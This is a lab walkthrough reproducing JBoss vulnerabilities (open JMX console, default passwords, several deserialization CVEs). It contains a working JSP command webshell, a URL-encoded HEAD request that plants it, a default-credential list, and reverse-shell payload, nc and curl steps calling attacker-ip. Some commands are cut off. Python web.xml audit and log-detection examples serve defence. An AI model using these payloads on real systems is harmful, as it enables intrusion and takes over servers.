
JBOSS Vulnerability Recurrence

Popularity: 488 / 2024-11-16 18:04:48

Jboss Vulnerability Replication

Lab environment: /vulhub/jboss

JMX Console Unauthorized Access Vulnerability

# Introduction
The JBoss web UI at http://ip:port/jmx-console can be reached without authentication (or with the default password admin/admin).
This discloses JBoss deployment and management information, and an attacker can also upload a JSP trojan directly to obtain a webshell.

Vulnerability Discovery

Visit http://ip:port/jmx-console; the vulnerability exists if the console opens directly or a weak password logs in.

Remote deployment of WAR packages

  1. Find the flavor=URL,type=DeploymentScanner entry (JBoss's built-in deployment function, which deploys remotely through a URL).
  2. Open it and find addURL.
  3. Deploy the WAR package on a VPS:
# Package the JSP trojan as a WAR package
jar -cvf

# Start a web server on the VPS
python3 -m

# Enter the address from which the WAR package is requested
http://your-ip:8000/
  4. Click Back to MBean View, check in the URLList whether the Value has been deployed, and finally click Apply Changes.
  5. Go back to the jmx-console directory and check whether the WAR trojan we deployed is present.
  6. Visit http://your-ip/shell/ and connect with AntSword.

Jboss weak password Getshell

The JBoss Administration Console can be logged into with a default account and password; once in the backend, deploy a WAR package to get a shell.

# jboss weak password

admin/admin
jboss/admin
admin/jboss
admin/123456
admin/password
  1. Open the Administration Console and log in with the default account admin/vulhub to reach the backend.
  2. Once inside, find Web Application (WAR), click Add a new resource, and deploy a WAR package (JSP trojan).
  3. Visit http://your-ip:8080/cmd/ and connect with AntSword.

CVE-2007-1036

The /jmx-console/HtmlAdaptor path in JBoss is exposed to the public without any authentication mechanism, so an attacker can enter the JMX console and perform any operation in it.
The exploit uses the DeploymentFileRepository -> store() method in the backend, which takes four parameters, to upload a shell:
p1 is the name of the WAR package to deploy, p2 is the filename of the uploaded file, p3 is the file extension of the uploaded file, and p4 is the content of the uploaded file. By controlling these four parameters you can upload a shell and take control of the whole server. p2 and p3 can be split across the two parameters (for example p2=she with the remainder in p3); the server still concatenates them and writes the file to the specified path.
  1. Visit the following URL to locate the store() method:
http://your-ip:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=:service=DeploymentFileRepository
  2. Deploy the WAR package:
  • p1: the name of the WAR package to deploy
  • p2: the filename of the uploaded file
  • p3: the file extension of the uploaded file
  • p4: the content of the uploaded file (the JSP trojan)
(the same JSP as the URL-decoded arg3 of the CVE-2010-0738 request below: it runs the cmd parameter with Runtime.exec and prints the output)
<%@ page import="java.io.*" %>
<% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s
= null; try { Process p = Runtime.getRuntime().exec(cmd); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output
+= s +"\r\n"; } } catch(IOException e) { e.printStackTrace(); } } out.println(output);%>
  3. Visit http://your-ip:8080/job1/ and it is ready to use.

CVE-2010-0738 (JMX Console security certification bypass)

The exploitation principle is the same as CVE-2007-1036, except that the HEAD request method is used to bypass a restriction that only applies to GET and POST requests.
Affected versions: JBoss 4.2.0 - JBoss 4.3.0
  1. Capture the request with a proxy, change GET to HEAD, and construct the following request:
HEAD /jmx-console/HtmlAdaptor?action=invokeOp&name=%3Aservice%3DDeploymentFileRep
ository&methodIndex=5&arg0=..//&arg1=shell&arg2=.jsp&arg3=%3c%25%40%20%70%61%
67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%69%6f%2e%2a%22%20%25%3e%20%0d%0a%3c%25%20%53%74%72%69%6e%67%20%63%6d%64%20%3d%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6d%64%22%29%3b%20%53%74%72%69%6e%67%20%6f%75%74%70%75%74%20%3d%20%22%22%3b%20%69%66%28%63%6d%64%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%53%74%72%69%6e%67%20%73%20%3d%20%6e%75
%6c%6c%3b%20%74%72%79%20%7b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%63%6d%64%29%3b%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%73%49%20%3d%20%6e%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72
%28%6e%65%77%20%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%3b%20%77%68%69%6c%65%28%28%73%20%3d%20%73%49%2e%72%65%61%64%4c%69%6e%65%28%29%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%70%75%74%20%2b%3d%20%73%20%2b%22%5c%72%5c%6e%22%3b%20%7d%20%7d%20%63%61%74%63%68%28%49%4f%45%78%63%65%70%74%69%6f%6e%20%65%29%20%7b%20%65%2e%70%72%69%6e%74%53%74%61%63%6b%54%72%61%63%65%28%29%3b%20%7d%20%
7d%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%6f%75%74%70%75%74%29%3b%25%3e&arg4=True HTTP/1.1
  • arg3 is the JSP trojan, simply URL-encoded.
  2. Visit http://your-ip:8080/jmx-console/?cmd=id
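From the defender's side, the two configuration mistakes behind the JMX console issues above (no security-constraint on jmx-console at all, which gives the unauthenticated console, and a constraint that lists only GET and POST so that a HEAD request slips past it, as in CVE-2010-0738) can be caught by auditing the console's web.xml. The following is an added example written for this page, not code from the original post, from JBoss or from vulhub; the three descriptors in it are constructed, and it assumes a Servlet 2.4-era container where methods not listed in a constraint are simply left unprotected:

```python
"""Audit a JBoss-style web.xml for an unprotected or method-limited jmx-console.

Added example for this page, not code from the original post, from JBoss or
from vulhub. Assumes a Servlet 2.4-era descriptor: a security-constraint that
lists http-method elements protects only those methods. Samples are constructed.
"""
import xml.etree.ElementTree as ET

CONSOLE_PATH = "/HtmlAdaptor"
COMMON_METHODS = ("GET", "POST", "HEAD", "PUT", "DELETE", "OPTIONS", "TRACE")

# Constructed sample 1: no security-constraint at all (old JBoss ships it
# commented out), so /HtmlAdaptor needs no login.
OPEN_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4">
  <servlet-mapping>
    <servlet-name>HtmlAdaptor</servlet-name>
    <url-pattern>/HtmlAdaptor</url-pattern>
  </servlet-mapping>
</web-app>"""

# Constructed sample 2: login required, but only for GET and POST.
WEAK_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4">
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>JBossAdmin</role-name>
    </auth-constraint>
  </security-constraint>
</web-app>"""

# Constructed sample 3: no http-method list, so every method is covered.
FIXED_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4">
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <role-name>JBossAdmin</role-name>
    </auth-constraint>
  </security-constraint>
</web-app>"""


def _strip_ns(root):
    """Drop namespaces ({uri}tag -> tag) so lookups work for any web-app schema."""
    for el in root.iter():
        el.tag = el.tag.rsplit("}", 1)[-1]
    return root


def pattern_covers(pattern, path):
    """Servlet-mapping style match: exact, path prefix (/x/*) or extension (*.jsp)."""
    if pattern in (path, "/*"):
        return True
    if pattern.endswith("/*"):
        prefix = pattern[:-2]
        return path == prefix or path.startswith(prefix + "/")
    return pattern.startswith("*.") and path.endswith(pattern[1:])


def audit_web_xml(xml_text, path=CONSOLE_PATH):
    """Return findings as dicts with a 'code' key; an empty list means clean."""
    root = _strip_ns(ET.fromstring(xml_text))
    findings, protected = [], False
    for sc in root.iter("security-constraint"):
        patterns = [p.text.strip() for p in sc.iter("url-pattern") if p.text]
        if not any(pattern_covers(p, path) for p in patterns):
            continue
        if sc.find("auth-constraint") is None:
            # A constraint without auth-constraint grants access to everyone.
            findings.append({"code": "NO_AUTH_CONSTRAINT", "patterns": patterns})
            continue
        protected = True
        methods = sorted(m.text.strip().upper() for m in sc.iter("http-method") if m.text)
        if methods:
            # Only the listed methods are checked; anything else falls through.
            uncovered = [m for m in COMMON_METHODS if m not in methods]
            findings.append({"code": "METHOD_BYPASS", "listed": methods, "uncovered": uncovered})
    if not protected:
        findings.append({"code": "UNAUTHENTICATED", "path": path})
    return findings


def audit_codes(xml_text):
    """Convenience wrapper: just the finding codes, in order."""
    return [f["code"] for f in audit_web_xml(xml_text)]


if __name__ == "__main__":
    for label, doc in (("open", OPEN_WEB_XML), ("weak", WEAK_WEB_XML), ("fixed", FIXED_WEB_XML)):
        print(label, audit_web_xml(doc))
```

Running it prints one finding list per descriptor. The fix shown in the third descriptor is simply to drop the http-method elements from the web-resource-collection so the auth-constraint applies to every method; the same audit can be pointed at any other JBoss web.xml by passing a different path to audit_web_xml.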

CVE-2015-7501 (JMXInvokerServlet Deserialization Vulnerability)

A Java deserialization vulnerability: the ReadOnlyAccessFilter in JBoss's HttpInvoker component deserializes the data stream sent by the client without any security checks, so the impact is very wide.
The vulnerability is triggered when JBoss reads an object supplied by the user in an /invoker/JMXInvokerServlet request.

Vulnerability Discovery

Visit http://ip:port/invoker/JMXInvokerServlet; the vulnerability exists if the response is offered as a file download.

Exploit

  1. Download JavaDeserH2HC:
git clone /joaomatosf/

cd JavaDeserH2HC
  2. Compile the file and generate the payload with the tool:
# Compile the file
javac -cp . :commons-collections-3.2.

# Generate the serialized payload with the tool
java -cp . :commons-collections-3.2. ReverseShellCommonsCollectionsHashMap attacker-ip:port
  3. Listen on port 6666 and use curl to send the generated file to JBoss:
# Listen
nc -lvvp 6666

# Send the malicious serialized data for JBoss to deserialize
curl http://target-ip:8080/invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollecti

  • Reverse shell obtained!

CVE-2017-7504 (JBossMQ JMS deserialization vulnerability)

CVE-2017-7504 is similar in principle to CVE-2015-7501; only the exploitation path has changed slightly, and CVE-2017-7504 appears under the /jbossmq-httpil/HTTPServerILServlet path.
Scope of impact: JBoss AS and previous versions

Vulnerability Discovery

Visit /jbossmq-httpil/HTTPServerILServlet; if the servlet's page appears, the vulnerability exists.

Exploit

Continue with JavaDeserH2HC; remember to have the attacker listening on port 6666.

# The serialized payload was already generated for the previous vulnerability, so just use curl directly
curl http://target-ip:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @
  • Success!

CVE-2017-12149 (JbossApplicationServer deserialization command execution vulnerability)

Same as above, with the path changed to /invoker/readonly.
Scope: JBoss -

Vulnerability Discovery

Visit /invoker/readonly; if an error page with status code 500 is returned, the vulnerability exists.

Exploit

  • Continue with JavaDeserH2HC:
curl http://target-ip:8080/invoker/readonly --data-binary @
  • Here comes the shell.
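For detection, the requests used throughout this page all leave recognisable traces in a reverse-proxy or WAF log: bodies sent to /invoker/JMXInvokerServlet, /invoker/readonly or /jbossmq-httpil/HTTPServerILServlet that begin with the Java serialization stream header (0xAC 0xED 0x00 0x05), HtmlAdaptor calls that invoke operations on DeploymentFileRepository or on the URL DeploymentScanner, HEAD requests to the console, and MBean arguments that carry JSP scriptlets. The following is an added example written for this page, not code from the original post, from JBoss or from vulhub; it assumes each request record is available as method, request target and at least the first bytes of the body, and the records in it are constructed (client addresses are from the 203.0.113.0/24 and 198.51.100.0/24 documentation ranges):

```python
"""Flag the JBoss attack patterns from this page in captured HTTP requests.

Added example for this page, not code from the original post, from JBoss or
from vulhub. Assumes each request record carries the method, the request
target (path plus query) and at least the first bytes of the body, as a
reverse proxy or WAF can log them. SAMPLE_REQUESTS is constructed.
"""
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoints that deserialize client-supplied Java objects
# (CVE-2015-7501, CVE-2017-7504 and CVE-2017-12149 above).
DESER_ENDPOINTS = {
    "/invoker/JMXInvokerServlet",
    "/invoker/readonly",
    "/jbossmq-httpil/HTTPServerILServlet",
}
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"  # java.io.ObjectOutputStream stream header
HTML_ADAPTOR = "/jmx-console/HtmlAdaptor"


def inspect_request(rec):
    """Return (severity, code, detail) alerts for one request record."""
    alerts = []
    method = rec["method"].upper()
    url = urlsplit(rec["target"])
    path = unquote(url.path)
    body = rec.get("body", b"")

    if path in DESER_ENDPOINTS:
        if body.startswith(JAVA_SERIAL_MAGIC):
            alerts.append(("high", "JAVA_SERIALIZED_BODY",
                           f"serialized Java object posted to {path}"))
        else:
            alerts.append(("info", "INVOKER_ENDPOINT_REACHED", f"{method} {path}"))

    if path.startswith("/jmx-console"):
        # parse_qs URL-decodes the values, so an encoded JSP in arg3 becomes readable.
        params = {k: v[0] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
        action, name = params.get("action", ""), params.get("name", "")
        if method not in ("GET", "POST"):
            alerts.append(("high", "NON_GET_POST_METHOD",
                           f"{method} to the JMX console (CVE-2010-0738 style bypass)"))
        if action.startswith("invokeOp"):
            if "DeploymentFileRepository" in name:
                alerts.append(("high", "DEPLOYMENT_FILE_REPOSITORY_INVOKE",
                               "operation invoked on DeploymentFileRepository (store() abuse)"))
            elif "DeploymentScanner" in name:
                alerts.append(("high", "REMOTE_WAR_DEPLOY",
                               "operation invoked on the URL DeploymentScanner (addURL abuse)"))
            else:
                alerts.append(("medium", "MBEAN_OPERATION_INVOKE", f"{action} on {name or '?'}"))
        elif path == HTML_ADAPTOR:
            alerts.append(("info", "JMX_CONSOLE_ACCESS", f"{action or 'index'} {name}"))
        if any("<%" in v for k, v in params.items() if k.startswith("arg")):
            alerts.append(("high", "JSP_SOURCE_IN_ARGS", "MBean argument carries a JSP scriptlet"))
    return alerts


def scan(records):
    """Return only the records that raised alerts, with their alert codes."""
    hits = []
    for rec in records:
        codes = [code for _, code, _ in inspect_request(rec)]
        if codes:
            hits.append((rec["src"], rec["method"], rec["target"], codes))
    return hits


# Constructed request records modelled on the steps described on this page.
SAMPLE_REQUESTS = [
    {"src": "203.0.113.7", "method": "POST", "target": "/invoker/JMXInvokerServlet",
     "body": JAVA_SERIAL_MAGIC + b"sr\x00\x11java.util.HashMap"},
    {"src": "203.0.113.7", "method": "HEAD",
     "target": "/jmx-console/HtmlAdaptor?action=invokeOp&name=%3Aservice%3DDeploymentFileRepository"
               "&methodIndex=5&arg0=..//&arg1=shell&arg2=.jsp&arg3=%3c%25%40%20page%20%25%3e&arg4=True",
     "body": b""},
    {"src": "203.0.113.7", "method": "GET",
     "target": "/jmx-console/HtmlAdaptor?action=invokeOpByName&name=flavor%3DURL%2Ctype%3DDeploymentScanner"
               "&methodName=addURL&arg0=http%3A%2F%2F203.0.113.7%3A8000%2Fshell.war",
     "body": b""},
    {"src": "198.51.100.2", "method": "GET",
     "target": "/jmx-console/HtmlAdaptor?action=inspectMBean&name=%3Aservice%3DDeploymentFileRepository",
     "body": b""},
    {"src": "198.51.100.2", "method": "POST", "target": "/invoker/readonly",
     "body": b"\xac\xed\x00\x05w\x02"},
    {"src": "198.51.100.2", "method": "GET", "target": "/index.html", "body": b""},
]

if __name__ == "__main__":
    for src, method, target, codes in scan(SAMPLE_REQUESTS):
        print(src, method, target[:60], codes)
```

The serialization header check is deliberately byte-based rather than path-based alone, because legitimate JBoss remoting clients also talk to the invoker servlets; the info-level INVOKER_ENDPOINT_REACHED alert is what you would feed into an allow-list of known client addresses, while the high-severity codes are the ones worth paging on.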